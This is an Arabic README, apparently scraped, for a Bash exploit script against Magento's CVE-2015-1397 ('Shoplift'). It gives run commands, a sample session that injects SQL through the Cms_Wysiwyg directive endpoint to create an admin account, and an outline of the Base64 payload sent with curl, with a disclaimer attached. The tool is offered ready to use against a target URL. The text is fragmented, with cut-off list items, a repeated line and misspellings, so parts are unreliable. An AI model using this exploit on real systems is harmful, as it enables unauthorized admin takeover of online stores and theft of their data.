
Bash script يستغل CVE-2015-1397 (Magento Shoplift) لإنشاء مستخدم إداري عبر حقن SQL. يتضمن مطالبات بيانات الاعتماد، ترميز Base64، ومعالجة الأخطاء لأغراض اختبار الاختراق والتعليم.
يستغل هذا النص البرمجي الثغرة CVE-2015-1397 في Magento، المعروفة باسم استغلال Magento Shoplift. وهي تتيح للمهاجم إنشاء مستخدم إداري جديد في قاعدة بيانات Magento عن طريق حقن حمولات SQL.
هذا النص مكتوب أصلاً بلغة Python بواسطة Manish Kishan Tanwar (error1046)، وقد تم تحويله إلى Bash مع مطالبات إدخال سهلة لبيانات الاعتماد بواسطة Divine Clown (0xDTC).
bash و curl و base64.chmod +x CVE-2015-1397
./CVE-2015-1397
http://target.com/).┌──(kali㉿kali)-[~/example]
└─$ ./CVE-2015-1397
Enter the target URL (e.g., http://target.com/): http://example.com/
Enter the new admin username: admin123
Enter the new admin password: pass123
[*] Sending payload to http://example.com/admin/Cms_Wysiwyg/directive/index/
[+] Exploit successful. Admin account created: admin123 / pass123
التحقق من الإدخال:
http:// أو https://.بناء الحمولة:
___directite مشفراً بـ Base64 يحتوي على استعلام SQL لإدراج مستخدم إداري جديد.الاستغلال:
POST إلى نقطة النهاية الضعيفة باستخدام curl.معالجة الاستجابة:
http:// أو https://.هذا النص البرمجي مخصص للأغراض التعليمية فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها غير قانوني وغير أخلاقي. المؤلف والمساهمون غير مسؤولين عن أي إساءة استخدام لهذه الأداة.
شكر خاص لـ: